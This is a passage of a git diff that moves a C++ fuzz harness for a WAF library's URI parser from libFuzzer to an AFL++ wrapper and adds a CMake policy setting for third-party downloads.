+#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "uri_utils.hpp" +#include -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) { return 0; } +using namespace ddwaf_afl; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - std::string_view uri_raw{reinterpret_cast(bytes), size}; - ddwaf::uri_parse(uri_raw); + auto uri_raw = bytes_to_string_view(data, size); + auto result = ddwaf::uri_parse(uri_raw); + + prevent_optimization(result); + return 0; } + +// Create AFL++ main function +AFL_FUZZ_TARGET("uri_parse_fuzz", LLVMFuzzerTestOneInput) \ No newline at end of file diff --git a/third_party/CMakeLists.txt b/third_party/CMakeLists.txt index ded0c4473..8c0474351 100644 --- a/third_party/CMakeLists.txt +++ b/third_party/CMakeLists.txt @@ -1,6 +1,11 @@ project(third_party) include(ExternalProject) +# Handle CMake policy CMP0135 for ExternalProject timestamp handling +if(POLICY CMP0135) + cmake_policy(SET CMP0135 NEW) +endif() + set(DOWNLOAD_SUBDIR downloads) set(INSTALL_DIR ${CMAKE_BINARY_DIR}/third_party) #get_filename_component(INSTALL_DIR ${CMAKE_BINARY_DIR}/third_party REALPATH)